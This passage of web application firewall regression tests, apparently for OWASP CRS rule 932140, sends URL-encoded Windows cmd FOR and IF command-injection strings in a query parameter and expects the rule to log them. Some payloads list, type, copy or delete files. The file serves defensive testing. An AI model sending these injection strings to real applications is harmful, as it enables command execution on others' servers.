method: GET - port: 80 - uri: "/get?foo=%26+FOR+%2FF+%22delims%3D%22+%25%7E+IN+++%28%27ECHO+foo%27%29DO+%40Echo+%25G" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-34 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=For+%2FR+C%3A%5Ctemp%5C+%25G+IN+%28%2A.bak%29+do+Echo+del+%22%25G%22" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-35 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=For+%2FR+C%3A%5Ctemp%5C+%25%25G+IN+%28%2A.bak%29+do+Echo+del+%22%25%25G%22" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-36 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=FOR+%2Ff+%22tokens%3D%2A%22+%25G+IN+%28%27dir+%2Fb%27%29+DO+%28call+%3Asubroutine+%22%25G%22%29" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-37 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=FOR+%2Ff+%22tokens%3D%2A%22+%25%25G+IN+%28%27dir+%2Fb%27%29+DO+%28call+%3Asubroutine+%22%25%25G%22%29" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-38 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=FOR+%2FF+%22tokens%3D1-5%22+%25A+IN+%28%22This+is+a+short+sentence%22%29+DO+%40echo+%25A+%25B+%25D" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-39 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=FOR+%2FF+%22tokens%3D1-5%22+%25%25A+IN+%28%22This+is+a+short+sentence%22%29+DO+%40echo+%25%25A+%25%25B+%25%25D" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-40 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=FOR+%25G+IN+%28a%2Cb%2Cc%2Cd%2Ce%2Cf%2Cg%2Ch%2Ci%2Cj%2Ck%2Cl%2Cm%2Cn%2Co%2Cp%2Cq%2Cr%2Cs%2Ct%2Cu%2Cv%2Cw%2Cx%2Cy%2Cz%29+DO+%28md+C%3A%5Cdemo%5C%25G%29" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-41 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=FOR+%25%25G+IN+%28a%2Cb%2Cc%2Cd%2Ce%2Cf%2Cg%2Ch%2Ci%2Cj%2Ck%2Cl%2Cm%2Cn%2Co%2Cp%2Cq%2Cr%2Cs%2Ct%2Cu%2Cv%2Cw%2Cx%2Cy%2Cz%29+DO+%28md+C%3A%5Cdemo%5C%25%25G%29" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-42 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=FOR+%2FL+%25G+IN+%281%2C1%2C5%29+DO+echo+%25G" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-43 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=FOR+%2FL+%25%25G+IN+%281%2C1%2C5%29+DO+echo+%25%25G" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-44 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=FOR+%25G+IN+%28Sun+Mon+Tue+Wed+Thur+Fri+Sat%29+DO+echo+%25G" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-45 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=FOR+%25%25G+IN+%28Sun+Mon+Tue+Wed+Thur+Fri+Sat%29+DO+echo+%25%25G" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-46 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=for+%2Ff+%22tokens%3D%2A%22+%25G+in+%28%27dir+%2Fb+%2Fs+%2Fa%3Ad+%22C%3A%5CWork%5Creports%2A%22%27%29+do+echo+Found+%25G" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-47 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=for+%2Ff+%22tokens%3D%2A%22+%25%25G+in+%28%27dir+%2Fb+%2Fs+%2Fa%3Ad+%22C%3A%5CWork%5Creports%2A%22%27%29+do+echo+Found+%25%25G" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-48 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=FOR+%2FD+%2Fr+%25G+in+%28%22User%2A%22%29+DO+Echo+We+found+%25G" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-49 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=FOR+%2FF+%22tokens%3D1%2C3+delims%3D%2C%22+%25%25G+IN+%28weather.txt%29+DO+%40echo+%25%25G+%25%25H" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-50 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=FOR+%2FF+%22tokens%3D4+delims%3D%2C%22+%25%25G+IN+%28%22deposit%2C%244500%2C123.4%2C12-AUG-09%22%29+DO+%40echo+Date+paid+%25%25G" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-51 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=FOR+%2FF+%25G+IN+%28%27%22C%3A%5Cprogram+Files%5Ccommand.exe%22%27%29+DO+ECHO+%25G" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-52 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=FOR+%2FF+%25%25G+IN+%28%27%22C%3A%5Cprogram+Files%5Ccommand.exe%22%27%29+DO+ECHO+%25%25G" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-53 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=FOR+%2FF+%22tokens%3D1%2C2%2A+delims%3D%2C%22+%25%25+IN+%28C%3A%5CMyDocu%7E1%5Cmytex%7E1.txt%29+DO+ECHO+%25%25" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-54 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=FOR+%2FF+%22tokens%3D1%2C2%2A+delims%3D%2C%22+%25%25G+IN+%28C%3A%5CMyDocu%7E1%5Cmytex%7E1.txt%29+DO+ECHO+%25%25G" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-55 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=FOR+%2FF+%22usebackq+tokens%3D1%2C2%2A+delims%3D%2C%22+%25G+IN+%28%22C%3A%5CMy+Documents%5Cmy+textfile.txt%22%29+DO+ECHO+%25G" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-56 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=FOR+%2FF+%22usebackq+tokens%3D1%2C2%2A+delims%3D%2C%22+%25%25G+IN+%28%22C%3A%5CMy+Documents%5Cmy+textfile.txt%22%29+DO+ECHO+%25%25G" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-57 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=%26+for+%2Ff+%5C%22delims%3D%5C%22+%25i+in+%28%27cmd+%2Fc+%5C%22set+%2Fa+%2863%2B21%29%5C%22%27%29+do+%40set+%2Fp+%3D+PDVQIS%25iPDVQISPDVQIS%3C+nul" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-58 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=%3Bfor+%2Ff+%5C%22delims%3D%5C%22+%25i+in+%28%27cmd+%2Fc+%5C%22set+%2Fa+%2835%2B66%29%5C%22%27%29+do+%40set+%2Fp+%3D+LZEUZE%25iLZEUZELZEUZE%3C+nul%27" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-59 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=for+%2Ff+%22tokens%3D%2A+delims%3D0%22+%25%25A+in+%28%22%25n1%25%22%29+do+set+%22n1%3D%25%25A%22" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-60 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=for+%25i+in+%28%2A%29+do+set+LIST%3D+%25i" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-61 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=for+%25i+in+%28%2A%29+do+set+LIST%3D%21LIST%21+%25i" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-62 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=for+%2Fl+%25%25I+in+%280%2C1%2C5%29+do+call+echo+%25%25RANDOM%25%25" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-63 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=for+%25%25d+in+%28A%2CC%2CD%29+do+DIR+%25%25d+%2A.%2A" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-64 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=for+%25%25f+in+%28%2A.TXT+%2A.BAT+%2A.DOC%29+do+TYPE+%25%25f" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-65 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=for+%25%25P+in+%28%25PATH%25%29+do+if+exist+%25%25P%5C%2A.BAT+COPY+%25%25P%5C%2A.BAT+C%3A%5CBAT" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-66 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=IF++++++++EXIST+filename.txt+++++%28" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-67 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=IF++++++++EXIST+filename+++++++++CMD" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-68 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=IF++++++++EXIST+filename+++++++++%28CMD%29" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-69 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=IF++++++++EXIST+data.xls+++++++++Echo+The+file+was+found." - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-70 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=IF++++++++EXIST+MyFile.txt+++++++%28ECHO+Some%5Bmore%5DPotatoes%29" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-71 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=IF++++++++EXIST+C%3A%5Cpagefile.sys++CMD" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-72 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=IF++++++++EXIST+C%3A%5Cpagefile.sys++%28CMD%29+ELSE+%28CMD%29" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-73 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=IF++++NOT+EXIST+C%3A%5Cnonexistent+++CMD" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-74 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=IF+%2FI+NOT+EXIST+C%3A%5Cnonexistent+++echo+hey" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-75 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=IF+++%2FI+++NOT+++EXIST+++C%3A%5Cnonexistent+++echo+hey" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-76 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=IF++++NOT+EXIST+C%3A%5Cnonexistent+++%28CMD%29+ELSE+%28CMD%29" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-77 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=IF++++NOT+EXIST+%28C%3A%5Cnonexistent%29+ECHO+pwnt" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-78 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=IF++++++++DEFINED+variable+++++++CMD" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-79 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=IF++++NOT+DEFINED+_example+++++++ECHO+Value+Missing" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-80 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=IF++++++++ERRORLEVEL+0+++++++++++CMD" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-81 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=IF++++NOT+ERRORLEVEL+0+++++++++++CMD" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-82 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=IF++++++++CMDEXTVERSION+1++++++++GOTO+start_process" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-83 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=IF++++++++2++++++++++++GEQ+15++++echo+%22bigger%22" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-84 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=IF++++++++%222%22++++++++++GEQ+%2215%22++echo+%22bigger%22" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-85 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=IF++++++++%25ERRORLEVEL%25+EQU+2+++++goto+sub_problem2" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-86 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=IF++++++++%25ERRORLEVEL%25+NEQ+0+++++echo+test" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-87 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=IF++++++++%25ERRORLEVEL%25+LEQ+2+++++echo+test" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-88 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=IF++++++++%25ERRORLEVEL%25+GTR+2+++++echo+test" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-89 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=IF++++++++%25ERRORLEVEL%25+GEQ+2+++++echo+test" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-90 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=IF++++++++%25VARIABLE%25+++GTR+0+++++Echo+An+error+was+found" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-91 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=IF++++++++%25VARIABLE%25+++LSS+0+++++Echo+An+error+was+found" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-92 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=IF++++++++%25VARIABLE%25+++EQU+0+++++Echo+An+error+was+found" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-93 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=IF+%2FI+++++item1%3D%3Ditem2+++++++++++CMD" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-94 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=IF+%2FI+NOT+item1%3D%3Ditem2+++++++++++CMD" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-95 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: 